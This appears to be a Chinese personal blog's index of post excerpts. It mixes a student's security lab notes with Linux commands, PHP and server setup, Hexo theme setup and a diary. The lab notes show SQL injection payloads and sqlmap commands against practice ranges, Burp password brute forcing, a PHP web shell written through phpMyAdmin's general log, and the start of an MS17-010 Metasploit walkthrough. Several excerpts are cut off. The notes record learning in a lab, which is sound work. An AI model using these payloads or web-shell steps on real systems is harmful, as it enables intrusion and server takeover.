发疯文学

Burp suit字符型注入（GET） 抓包获取查询发送给重发器 判断闭合条件查询vince’（单引号）报错 查询vince”（双引号）没有报错可知使用‘单引号闭合 把vince’ and 1=1–+ and 1=1 返回正常，and 1=2 查询不到用户 查询字段数order by 2–+ 查字段是否为2时，没有报错，查字段数是否为3时，报错。字段数为2 查询回显位union select 1,2–+ 显示结果 说明字段1和2都是回显位 暴力破解简单的暴力破解 直接抓包，发送给 intruder 选择password 在有效荷载（简单列表）出添加猜测的密码（至少有一个正确的）点击开始攻击 sql-labs/Less-?sql注入通关 打开Kali 进入管理员界面 sqlmap -u "http://" --batch --dbssqlmap -u "http://" --batch -D "security" --tablessqlmap -u "http://&quo ...

MySQLmysql基础知识 注入点检测 页面返回正常 and 1=1--+or 1=2--+ 页面返回异常 and 1=2--+or 1=1--+ 判断注入类型 数字型注入字符型注入POST: POST 方式提交数据，注入点位置在 POST 数据部分，常发生在表单中GET:提交方式是 GET , 注入点的位置在 GET 参数部分Cookie：HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中HTTP 头：注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中 靶机pikachu将压缩包解压在C:\phpstudy_pro\WWW目录下 进入pikachu文件夹的inc目录，修改靶场配置文件config.inc.php，设置数据库账号密码均为root 将文件config.inc.php重命名为config.php 在浏览器中打开进行初始化 基本函数 version()：查询数据库版本user()：查询数据库使用者database():数据库system_user():系统用户名session_user():连接 ...

phpmyadminphpMyAdmin是众多 MySQL图形化管理工具中使用最为广泛的一种，是一款使用PHP 开发的基于B/S模式的 MySQL 客户端软件，该工具是基于 Web 跨平台的管理程序。 show global variables like '%secure%' 开启全局日志 set global general_log=ON 更改日志路径 set global general_log_file="C:/phpstudy_pro/WWW/1.php" 测试 select '<? phpinfo(); ?>' 测试结果 安装蚁剑执行语句 select '<?php @eavl($_post[cmd]); ?>' 1：安装蚁剑 蚁剑加载器： 核心源码： （加载器中初始化不成功，GitHub上下载的核心源码） 2：使用蚁剑 右键空白处添加数据，输入地址和密码【cmd】 测试链接（连接成功）

rm -f /var/run/yum.pid 清理睡眠状态 rm -f /var/run/yum.pidfirewall-cmd --permanent --zone=public --add-port=3306/tcpfirewall-cmd --permanent --zone=public --add-port=3306/udpfirewall-cmd --permanent --zone=public --add-port=80/tcpfirewall-cmd --permanent --zone=public --add-port=80/udpfirewall-cmd --reloadvi /etc/selinux/config #将SELINUX=enforcing这一行修改为SELINUX=disabledrebootyum remove mariadb-libs.x86_64yum install httpd -ysystemctl enable httpdsystemctl restart httpdsystemct ...

Linux常用命令ifconfigshutdown //关机reboot //重启lsls --color=auto //着色ls命令的输出alias //允许在shell会话中定义临时别名unalias //从一定义的别名中删除aliaspwd //打印工作目录/当前文件的绝对路径cd //更改目录cp //copyrm //删除mv //重命名mkdir //创建目录man //显示任何其他命令touch //更新指定文件的访问和修改时间chmod //快速更改文件的权限（只读：r；写入：w；执行：x）./ //直接从终端运行可执行文件sudo/su //修改用户htop //交互式流程查看器unzip //解压apt/yum/pacman //安装echo //在终端显示定义的文本（print） >/>> //输出重定向cat //用于直接从终端创建、查看和连接文件。它主要用于在不打开图形文本编辑器的情况下预览文件ps //可以查看当前shell会话 ...

php网站的搭建192.168.5.110 登陆界面 评论界面 Linux系统的文件结构/bin 二进制文件，系统常规命令/boot 系统启动分区，系统启动时读取的文件/dev 设备文件/etc 大多数配置文件/home 普通用户的家目录/lib 32位函数库/lib64 64位库/media 手动临时挂载点/mnt 手动临时挂载点/opt 第三方软件安装位置/proc 进程信息及硬件信息/root 临时设备的默认挂载点/sbin 系统管理命令/srv 数据/var 数据/sys 内核相关信息/tmp 临时文件/usr 用户相关设定 关机shutdown -h now 或者 poweroff //立刻关机shutdown -h 2 //两分钟后关机 重启shutdown -r now 或者 reboot //立刻重启sh ...

PHP学习与搭建网站 安装PHPstudy 配置PHPstudy 点击启动Apache、Mysql 更改php版本 打开根目录，清楚www文件下所有文件 点击软件管理，下载SQL_Front5.3，完成后点开管理 配置数据库 在www文件目录下编写php文件（暂无，win10虚拟机无法打开） 运行php文件 安装Yakit

博客主题的更换 选择自己喜欢的主题 主题：butterfly 将主题加载在博客的themes下 butterfly 修改根目录下的_config.yml文件：themes: butterfly installation: 1. git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/butterfly(克隆) npm i hexo-theme-butterfly npm install hexo-renderer-pug hexo-renderer-stylus 主题的渲染 [Hexo]Hexo搭建Butterfly主题并快速美化_hexo主题_CoolTiger、的博客-CSDN博客 永恒之蓝 安装虚拟机 虚拟机wiin7系统 获取IP地址（Kali：ifconfig \Windows7：IPconfig) 虚拟机网络配置（桥接模式） 利用MS17_010漏洞渗透目标主机 msf console search ms17_010 use 3 ...

今天也是美好的一天呀 乌蒙山连着山外山月光洒在了响水滩有没有人能够告诉我是苍天对你在呼唤一座山连着一条河哈哈哈哈哈哈#include<stdio.h>int main(){ print("hello,world!");} 1 2 日期 心情 11.01 一 11.02 …… 11.03 & 11.04 * 11.05 # 11.06 @ 11.07 ! hexo博客

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post$ hexo new "My New Post" More info: Writing Run server$ hexo server More info: Server Generate static files$ hexo generate More info: Generating Deploy to remote sites$ hexo deploy More info: Deployment